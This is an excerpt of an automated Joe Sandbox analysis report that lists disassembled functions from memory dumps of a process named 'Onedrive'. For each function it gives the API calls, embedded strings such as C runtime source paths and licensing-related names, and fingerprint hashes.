                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
                                                    • API String ID: 0-4089689869
                                                    • Opcode ID: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                                    • Instruction ID: c16ef597480be778db93845fbbe1fdd5624f65c38d233551ef6f952ee06a1b98
                                                    • Opcode Fuzzy Hash: 1ac1be5a7282ee981aa8c6e2645118313e67f99d674ba1043b3155909c36ed17
                                                    • Instruction Fuzzy Hash: 85715F71B0CA8289E760DB12E460B6AB3A1FB84394F954131E6EE5B6EDDF3CD545CB00
                                                    Function 00007FF63EA153E4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetupOpenInfFileW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15414
                                                    • SetupGetLineCountW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15440
                                                      • Part of subcall function 00007FF63EA162F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                      • Part of subcall function 00007FF63EA162F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    • SetupGetLineByIndexW.SETUPAPI(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA1548F
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000002,?,?,?,00007FF63EA161BD), ref: 00007FF63EA15555
                                                      • Part of subcall function 00007FF63EA15020: SetupGetStringFieldW.SETUPAPI ref: 00007FF63EA15060
                                                      • Part of subcall function 00007FF63EA15020: GetLastError.KERNEL32 ref: 00007FF63EA15070
                                                      • Part of subcall function 00007FF63EA15020: GetProcessHeap.KERNEL32 ref: 00007FF63EA15114
                                                      • Part of subcall function 00007FF63EA15020: HeapFree.KERNEL32 ref: 00007FF63EA15129
                                                    • SetupCloseInfFile.SETUPAPI ref: 00007FF63EA15595
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Setup$Heap$ErrorFileFreeLastLineProcess$CloseCountFieldIndexOpenString
                                                    • String ID: IsoCodes
                                                    • API String ID: 2280877036-2510055618
                                                    • Opcode ID: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                                    • Instruction ID: b3cf964b10d8d6b701a74deec162d9953e12fa55626cb60f84990176bdb3692c
                                                    • Opcode Fuzzy Hash: be652fbc45620a5908cb8072d4c18c3619e8032dbb75b623b03805d778d16cbb
                                                    • Instruction Fuzzy Hash: ED51E622F147039AFB00CBB698103BD26A2BB647A4F955135EE1DD7784EF39D449D720
                                                    Function 00007FF63EA16B88 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: String$DirectFree$AllocContentElement@Release@String@Value@Value@2@@
                                                    • String ID: ErrorCID
                                                    • API String ID: 4116192075-3250631935
                                                    • Opcode ID: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                                    • Instruction ID: dae7c7969f3264b9e8889c269cd5ebff5bf0781b8b34542bc60b5e135740bb46
                                                    • Opcode Fuzzy Hash: 1a5d23ca152dadde304749bc145f2caeedeb1fc9cf03495dad69489016ff52c3
                                                    • Instruction Fuzzy Hash: 0651BF21F09A5B82EE156B92E45027D5A91EFF8B91F054434FD0EEB391DE3CE80D63A0
                                                    Function 00007FF63EA160D4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA162F0: GetProcessHeap.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16414
                                                      • Part of subcall function 00007FF63EA162F0: HeapFree.KERNEL32(?,?,0000200000000000,00007FF63EA165C4,?,?,?,?,?,?,?,?,?,00007FF63EA17F0D), ref: 00007FF63EA16428
                                                    • GetSystemDirectoryW.KERNEL32 ref: 00007FF63EA1611C
                                                    • GetLastError.KERNEL32 ref: 00007FF63EA1612C
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA16240
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA16255
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$DirectoryErrorLastSystem
                                                    • String ID: \Phone.inf$\SPPUI
                                                    • API String ID: 2626721824-3874405122
                                                    • Opcode ID: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                                    • Instruction ID: ea4281abefc9628286abd46c37d96e46e81adf04ce51f9228a6bc83afec808d1
                                                    • Opcode Fuzzy Hash: 6d05aa4b119cfc8b7ba9d63c53efe4eb13d6923910aefcd4dd07ad0bc0ba184a
                                                    • Instruction Fuzzy Hash: EC519331F1864686EB249BA1E4506BA6691FFF4780F554035FA4EC3785DF3CE408A720
                                                    Function 00007FFDF3AFA6D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00007FFDF3AFA7C4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_EnvironmentSchedulerScheduler::_Strings
                                                    • String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
                                                    • API String ID: 3101938-170101930
                                                    • Opcode ID: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                                    • Instruction ID: 3dc227e66d8876ac4c18462a11bb560340ada6f98ff3beaa88f17f873f017151
                                                    • Opcode Fuzzy Hash: 1a6f84b2561e5535daf748ba60a4e3f0bf090e61d0fe745ac4c143497b32d4e6
                                                    • Instruction Fuzzy Hash: B5510722618B8181E750EB26E4617ABB3A0FB91340F510035E6DE5AAEEEF7DD4488B40
                                                    Function 00007FFDF3AFDE50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                    • API String ID: 0-1026578051
                                                    • Opcode ID: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                                    • Instruction ID: bb1e730e88d984508fe5afd3c1272e9fb946eb31fdafd2ba5468df01a6078a5a
                                                    • Opcode Fuzzy Hash: 2d2887217acbfcfde2987cc382d93a8f4af831361eccd80c7ef075718c55646e
                                                    • Instruction Fuzzy Hash: 78516F71B1C64286E7109F25E460B6AB7A0FB80358F521235E2BD5B6EDDF3CD541CB40
                                                    Function 00007FFDF3AD8640 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_unique_heap_ptr
                                                    • String ID: S$minkernel\crts\ucrt\src\appcrt\stdio\_file.cpp
                                                    • API String ID: 4142048518-4206356308
                                                    • Opcode ID: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                                    • Instruction ID: 1f94c950eef2d0986507e1b5963ccdbed919048ca0f2087cbc4b72ed0a075e04
                                                    • Opcode Fuzzy Hash: 6b863b76f611ed7eccb153eacd5d39ea5bac51b1c5f065df2645d33949e99aaf
                                                    • Instruction Fuzzy Hash: EC517D61B1DA4281EB51DB15E8B4B7977A4EB81750F421336E9BE6E7E8DF3CE4408B00
                                                    Function 00007FF63EA16EAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$ErrorExecuteFreeLastProcessShellmemset
                                                    • String ID: https://go.microsoft.com/fwlink/?LinkId=521839
                                                    • API String ID: 1345967500-776123123
                                                    • Opcode ID: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                                    • Instruction ID: 03db0ec21c9a1e8119ea2980cd5c179887447e8e490d2f8306f7f6da55949b5f
                                                    • Opcode Fuzzy Hash: 3c8ff984376a63563433bb517d180c30302da773993a283fbe1b66f1df6943b3
                                                    • Instruction Fuzzy Hash: 97411D32B08A468AEB04AFB5D4503BD67E1EFA8748F554435FA0ED7795DE38E409E320
                                                    Function 00007FFDF3AFDAA0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AFDAB8
                                                    • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AFDAC2
                                                      • Part of subcall function 00007FFDF3AF0B40: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF0B58
                                                      • Part of subcall function 00007FFDF3AF0D10: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF0D65
                                                      • Part of subcall function 00007FFDF3AF53C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF53D3
                                                      • Part of subcall function 00007FFDF3AF53C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AF53DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                                    • String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                    • API String ID: 4164245112-3166852756
                                                    • Opcode ID: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                                    • Instruction ID: 905762befb87bdf40ea594b0115d99d87245a6034c59ed48d6bd379d9f24b4ea
                                                    • Opcode Fuzzy Hash: 7981988369232ab8f8a893ab0169fe3df660103c30c3250769104b9faaa05007
                                                    • Instruction Fuzzy Hash: 54411031B1CA8281EB10EB22E475B6EB760EB81754F510131E6AE5B6DEDF3CD545C740
                                                    Function 00007FFDF3AF4060 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _aligned_msize_invoke_watson_if_error
                                                    • String ID: ]$fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                                                    • API String ID: 1871870440-1759674166
                                                    • Opcode ID: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                                    • Instruction ID: 7f514ad7fe69eb829edce7634bb0ef50a67e50a3010bbe0d15652c601e464b70
                                                    • Opcode Fuzzy Hash: 40cbd8fc9f1d8437863cf3e661c1112528bfb2bcb4896d92b27ef83705352061
                                                    • Instruction Fuzzy Hash: F9413F22A1C7818AE750DB2AE4A076ABBE0E795744F110125F6ED87BE9DB7CD440CF40
                                                    Function 00007FFDF3AFD940 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                    • API String ID: 614740146-2931739134
                                                    • Opcode ID: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                                    • Instruction ID: 13b8d9c07c5f1e7d6acfffea7172b99317d459b28ea214fe5a9feb353f4f6cf5
                                                    • Opcode Fuzzy Hash: 39e73b053c62ea83c06c082d52e2ef81818531d9a583e9f0d21007848b92ed5a
                                                    • Instruction Fuzzy Hash: D4313031B1CA8291E710EB26E471A6A7760FB81384F911131F6AE5B6EDDF3CD544CB80
                                                    Function 00007FF63EA1A23C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A281
                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A2AD
                                                    • SLGetProductSkuInformation.SLC(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A2E2
                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,?,00007FF63EA1A536,?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A311
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeInformationLocalProduct
                                                    • String ID: DependsOn$Family
                                                    • API String ID: 942381732-1323192929
                                                    • Opcode ID: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                                    • Instruction ID: 41a37a45e8a09369764504f8f6ce5cfc31adb768b09003cdb728c4c0ce8a2818
                                                    • Opcode Fuzzy Hash: f562f756d88fc8698ec4015293d1e350d35409882a8b0caa2c134b110c04492a
                                                    • Instruction Fuzzy Hash: A021AE32B18B428AEB118F92E4845BDB7A4FBA9B90F558135EE4E83710DF3DD449D720
                                                    Function 00007FFDF3B0EC60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: _abstract_cw$_hw_cw
                                                    • String ID: %ls$(mask&~(_MCW_DN|_MCW_EM|_MCW_RC))==0$minkernel\crts\ucrt\src\appcrt\tran\amd64\ieee.c
                                                    • API String ID: 787819578-4254588316
                                                    • Opcode ID: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                                    • Instruction ID: 83b6bc8ef80c97cc69ff9d11fe47ef0b3ff43eb986f621117bb907bda4c84d7f
                                                    • Opcode Fuzzy Hash: 3c7496dc418791ef6ba757f371fe8972095d737ac954d17e3b05e68fa93950f6
                                                    • Instruction Fuzzy Hash: D9311C72B2CA418BD354DB14E4B192A76A1EB84740F451135F6EA9BBDDDE2CE840CF04
                                                    Function 00007FFDF3AF53C0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                                                    • API String ID: 614740146-3741990651
                                                    • Opcode ID: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                                    • Instruction ID: 5d63aabdfd7754a0a0464a71142bfd81594020c4029200613e48f77977357fe6
                                                    • Opcode Fuzzy Hash: fbaf7d3e15aa925d7e701ef2d92dac18c3d8396f506b789b98d13b46ce91094e
                                                    • Instruction Fuzzy Hash: B4214D71B1CA8295E750AB22E470BAB7660FB90344F811131E6AE5B6DDDF7CD544CB40
                                                    Function 00007FF63EA1BB50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrToID.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB6B
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB7E
                                                    • ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BB96
                                                    • ?SetValue@Element@DirectUI@@QEAAJP6APEBUPropertyInfo@2@XZHPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BBD0
                                                    • ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF63EA1B9AC), ref: 00007FF63EA1BBDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Direct$Value@$Element@V12@$CreateDescendent@E__@@@FindInfo@2@PropertyRelease@String@Value@2@@
                                                    • String ID: ErrorCID
                                                    • API String ID: 3965188616-3250631935
                                                    • Opcode ID: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                                    • Instruction ID: cbb536b3345c40d53ef14c058ce732a8c53a4c305f7801c318749b89c2a92247
                                                    • Opcode Fuzzy Hash: 1ee354ba4db03265580357cb67ba2b8d0dd7a090ad87e17df1e797e7864e6d7e
                                                    • Instruction Fuzzy Hash: 95113C36A08A82C3EB145B52A850078ABA1FFF9B81F489171ED4E97758CF3CD4499720
                                                    Function 00007FFDF3AF9590 Relevance: 9.3, APIs: 6, Instructions: 300COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
